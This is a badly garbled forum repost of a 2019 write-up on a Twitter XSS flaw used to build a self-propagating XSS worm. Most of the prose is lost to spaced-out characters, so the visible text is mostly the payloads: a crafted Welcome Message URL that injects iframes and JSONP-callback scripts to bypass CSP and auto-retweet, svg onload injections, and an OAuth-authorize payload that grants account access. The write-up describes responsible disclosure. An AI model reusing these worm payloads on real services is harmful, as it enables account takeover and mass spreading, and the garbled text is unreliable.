[14133] 2019-05-21_从Twitter的XSS漏洞构造出TwitterXSSWorm

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-18
2019-05-21_从Twitter的XSS漏洞构造出TwitterXSSWorm T w i t t e r X S S T w i t t e r   X S S   W o r m c l o u d s   F r e e B u f   2 0 1 9 - 0 5 - 2 1 2 0 1 8 T w i t t e r X S S T w i t t e r X S S X S S   w o r m X S S   W o r m X S S   W o r m X S S X S S X S S 广 2 0 0 5 M y s p a c e 1 9 X S S   w o r m M y s p a c e 1 0 0 2 0 0 7 X S S   w o r m 8 7 0 0 X S S   w o r m w i k i p e d i a X S S   W o r m   P a y l o a d X S S   W o r m   P a y l o a d T w i t t e r   X S S   w o r m U R L e x p l o i t X S S T w i t t e r U R L X S S   w o r m U R L e x p l o i t h t t p s : / / t w i t t e r . c o m / m e s s a g e s / c o m p o s e ? r e c i p i e n t _ i d = 9 8 8 2 6 0 4 7 6 6 5 9 4 0 4 8 0 1 & w e l c o m e _ m e s s a g e _ i d = 9 8 8 2 7 4 5 9 6 4 2 7 3 0 4 9 6 4 & t e x t = % 3 C % 3 C x % 3 E / s c r i p t % 3 E % 3 C % 3 C x % 3 E i f r a m e % 2 0 i d % 3 D _ _ t w t t r % 2 0 s r c % 3 D / i n t e n t / r e t w e e t % 3 F t w e e t _ i d % 3 D 1 1 1 4 9 8 6 9 8 8 1 2 8 6 2 4 6 4 0 % 3 E % 3 C % 3 C x % 3 E / i f r a m e % 3 E % 3 C % 3 C x % 3 E s c r i p t % 2 0 s r c % 3 D / / s y n d i c a t i o n . t w i m g . c o m / t i m e l i n e / p r o f i l e % 3 F c a l l b a c k % 3 D _ _ t w t t r / a l e r t % 3 B u s e r _ i d % 3 D 1 2 % 3 E % 3 C % 3 C x % 3 E / s c r i p t % 3 E % 3 C % 3 C x % 3 E s c r i p t % 2 0 s r c % 3 D / / s y n d i c a t i o n . t w i m g . c o m / t i m e l i n e / p r o f i l e % 3 F c a l l b a c k % 3 D _ _ t w t t r / f r a m e s % 5 B 0 % 5 D . r e t w e e t _ b t n _ f o r m . s u b m i t % 3 B u s e r _ i d % 3 D 1 2 % 3 E u r l d e c o d e U R L h t t p s : / / t w i t t e r . c o m / m e s s a g e s / c o m p o s e ? r e c i p i e n t _ i d = 9 8 8 2 6 0 4 7 6 6 5 9 4 0 4 8 0 1 & w e l c o m e _ m e s s a g e _ i d = 9 8 8 2 7 4 5 9 6 4 2 7 3 0 4 9 6 4 & t e x t = < / s c r i p t > < i f r a m e   i d = _ _ t w t t r   s r c = / i n t e n t / r e t w e e t ? t w e e t _ i d = 1 1 1 4 9 8 6 9 8 8 1 2 8 6 2 4 6 4 0 > < / i f r a m e > < s c r i p t   s r c = / / s y n d i c a t i o n . t w i m g . c o m / t i m e l i n e / p r o f i l e ? c a l l b a c k = _ _ t w t t r / a l e r t ; u s e r _ i d = 1 2 > < / s c r i p t > < s c r i p t s r c = / / s y n d i c a t i o n . t w i m g . c o m / t i m e l i n e / p r o f i l e ? c a l l b a c k = _ _ t w t t r / f r a m e s [ 0 ] . r e t w e e t _ b t n _ f o r m . s u b m i t ; u s e r _ i d = 1 2 > T w i t t e r U R L U R L W e l c o m e   M e s s a g e d e e p l i n k T w i t t e r   C a r d T w i t t e r W e l c o m e   M e s s a g e h t t p s : / / d e v e l o p e r . t w i t t e r . c o m / e n / d o c s / d i r e c t - m e s s a g e s / w e l c o m e - m e s s a g e s / o v e r v i e w
D e e p l i n k U R L A P P A P P A P P A P P d e e p l i n k d e e p l i n k A P P T w i t t e r   C a r d P i n t e r e s t r i c h   p i n T w i t t e r   C a r d S u m m a r y   C a r d S u m m a r y   C a r d   w i t h   L a r g e I m a g e p h o t o   c a r d G a l l e r y   C a r d A P P   C a r d P l a y e r   C a r d P l a y   C a r d :   a p p r o v e   g u i d e P r o d u c t   C a r d   8 X S S   W o r m X S S X S S T w i t t c e   C a r d i f r a m e   " h t t p s : / / t w i t t e r . c o m / i / c a r d s / t f w / v 1 / 1 1 1 4 9 9 1 5 7 8 3 5 3 9 3 0 2 4 0 "   i f r a m e s a m e - o r i g i n D O M 访 U R L P a y l o a d " t e x t " U R L T w i t t c e   C a r d " t e x t " J S O N " d e f a u l t _ c o m p o s e r _ t e x t " H T M L s c r i p t T w i t t e r W A F W e b 1       2 H T M L     3 P a y l o a d 3 0 0 4 C S P I n l i n e   S c r i p t s H T M L H T M L H T M L H T M L H T M L P a y l o a d P a y l o a d P a y l o a d T w i t t e r H T M L   X S S C S P T w i t t e r T w i t t e r C S P X S S T w i t t e r C S P C S P T w i t t e r C S P C S P T w i t t e r h t t p s : / / t w i t t e r . c o m / C S P T w i t t e r   C a r d s C S P C S P T w i t t e r   C a r d s   C S P s c r i p t - s r c h t t p s : / / * . t w i m g . c o m C S P T w i t t e r   C a r d s J S O N t w i m g . c o m J S O N c a l l b a c k   v a l i d a t i o n T w i t t e r   ' a l e r t '   T w i t t e r 便   ' / ' c a l l b a c k     ? c a l l b a c k = _ _ t w t t r / a l e r t   ' w i n d o w ' 1     P a y l o a d 2 H T M L I D ' w i n d o w ' 2 J a v a S c r i p t ? t e x t = < < x > / s c r i p t > < < x > i f r a m e   i d = _ _ t w t t r   s r c = / i n t e n t / r e t w e e t ? t w e e t _ i d = 1 1 1 4 9 8 6 9 8 8 1 2 8 6 2 4 6 4 0 > < < x > / i f r a m e > < < x > s c r i p t   s r c = / / s y n d i c a t i o n . t w i m g . c o m / t i m e l i n e / p r o f i l e ? c a l l b a c k = _ _ t w t t r / a l e r t ; u s e r _ i d = < s c r i p t   t y p e = " t e x t / t w i t t e r - c a r d s - s e r i a l i z a t i o n " >     {         " s t r i n g s " :   {   } ,         " c a r d " :   {     " v i e w e r _ i d "   :   " 9 8 8 2 6 0 4 7 6 6 5 9 4 0 4 8 0 1 " ,     " i s _ c a p s _ e n a b l e d "   :   t r u e ,     " f o r w a r d "   :   " f a l s e " ,     " i s _ l o g g e d _ i n " a < / s c r i p t > b a b < / s c r i p t > < s v g   o n l o a d = a l e r t ( ) > < < / < x > / s c r i p t / t e s t 0 0 0 > < < / < x > s v g   o n l o a d = a l e r t ( ) > < / > < s c r i p t > 1 < x > 2 < / s c r i p t / t e s t 0 0 0 > < s v g   o n l o a d = a l e r t ( ) > s c r i p t - s r c   ' n o n c e - E T j 4 1 i m z I Q / a B r j F c b y n C g = = '   h t t p s : / / t w i t t e r . c o m   h t t p s : / / * . t w i m g . c o m   h t t p s : / / t o n . t w i t t e r . c o m   ' s e l f ' ;   f r a m e - a n c e s t o r s   h t t p s : / / m s 2 . t w i t t e r . c o m   h t t p s : / / t w i t t e r . c o m   h t t p : / / l o c a l h o s t : _ _ t w t t r _ _ t w t t r a l e r t u n d e f i n e d / * * / _ _ t w t t r / a l e r t ( { " h e a d e r s " : { " s t a t u s " : 2 0 0 , " m a x P o s i t i o n " : " 1 1 1 3 3 0 0 8 3 7 1 6 0 2 2 2 7 2 0 " , " m i n P o s i t i o n " : " 1 0 9 8 7 6 1 2 5 7 6 0 6 3 0 7 8 4 0 " , " x P o l l i n g " : 3 0 , " t i m e " : 1 5 5 4 6 6 8 0 5 6 } , " b o d y " : " [ . . . ] " } ) ; _ _ t w t t r _ _ t w t t r _ _ t w t t r
c a l l b a c k = _ _ t w t t r / a l e r t ; u s e r _ i d = 1 2 & S a m e   O r i g i n M e t h o d   E x e c u t i o n P a y l o a d 1 I D _ _ t w t t r i f r a m e   T w i t t e r   W e b   I n t e n t s h t t p s : / / t w i t t e r . c o m / i n t e n t / r e t w e e t ? t w e e t _ i d = 1 1 1 4 9 8 6 9 8 8 1 2 8 6 2 4 6 4 0 2 C S P i f r a m e 使 3 C S P i f r a m e f o r m X S S   w o r m X S S   w o r m X S S   w o r m T w i t t e r   W e b   I n t e n t s t w e e t   I D   t w e e t   I D s X S S   W o r m 1 P a y l o a d T w i t t e r 2 X S S   P a y l o a d e x p l o i t h t t p s : / / t w i t t e r . c o m / i n t e n t / r e t w e e t ? t w e e t _ i d = 1 1 1 4 9 8 6 9 8 8 1 2 8 6 2 4 6 4 0 ' f r a m e s [ 0 ] . r e t w e e t _ b t n _ f o r m . s u b m i t '   e x p l o i t T w i t t e r T w i t t e r   -     X S S   W o r m T w i t t e r X S S   W o r m X S S   W o r m T w i t t e r T w i t t e r o a u t h / a u t h o r i z e   T w i t t e r i f r a m e   h t t p s : / / t w i t t e r . c o m / o a u t h / a u t h o r i z e ? o a u t h _ t o k e n = [ t o k e n ]     I D X S S   W o r m 1 P a y l o a d I D 2 I D 3 P a y l o a d T w i t t e r T w i t t e r " o a u t h _ t o k e n " X S S   W o r m T w i t t e r 2 0 1 8 . 4 . 2 3       X S S 2 0 1 8 . 4 . 2 5       2 0 1 8 . 4 . 2 7       T w i t t e r $ 2 , 9 4 0 2 0 1 8 . 5 . 4           X S S 2 0 1 9 . 4 . 7           C S P 2 0 1 9 . 4 . 1 2         X S S   W o r m T w i t t e r w r i t e - u p 2 0 1 9 . 4 . 1 2         T w i t t e r 2 0 1 9 . 4 . 2 2       T w i t t e r C S P 2 0 1 9 . 5 . 2           * v i r t u e s e c u r i t y c l o u d s F r e e B u f . C O M a l e r t a l e r t s e t T i m e o u t ( f u n c ) o a u t h _ f o r m < / s c r i p t > < i f r a m e   s r c = / o a u t h / a u t h o r i z e ? o a u t h _ t o k e n = c X D z j w A A A A A A 4 _ E b A A A B a i z u C O k > < / i f r a m e > < / s c r i p t > < s c r i p t   i d = _ _ t w t t r   s r c = / / s y n d i c a t i o n . t w i m g . c o m / t w e e t s . j s o n ? c a l l b a c k = _ _ t w t t r / p a r e n t . f r a m e s [ 0 ] . o a u t h _ f o r m . s u b m i t ; i d s = 2 0 > < / s c r i p t > < / s c r i p t > < i f r a m e   s r c = / i / c a r d s / t f w / v 1 / 1 1 1 8 6 0 8 4 5 2 1 3 6 4 6 0 2 8 8 > < / i f r a m e > < i f r a m e   s r c = / i / c a r d s / t f w / v 1 / 1 1 1 8 6 0 9 4 9 6 5 6 0 0 2 9 6 9 6 > < / i f r a m e >

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则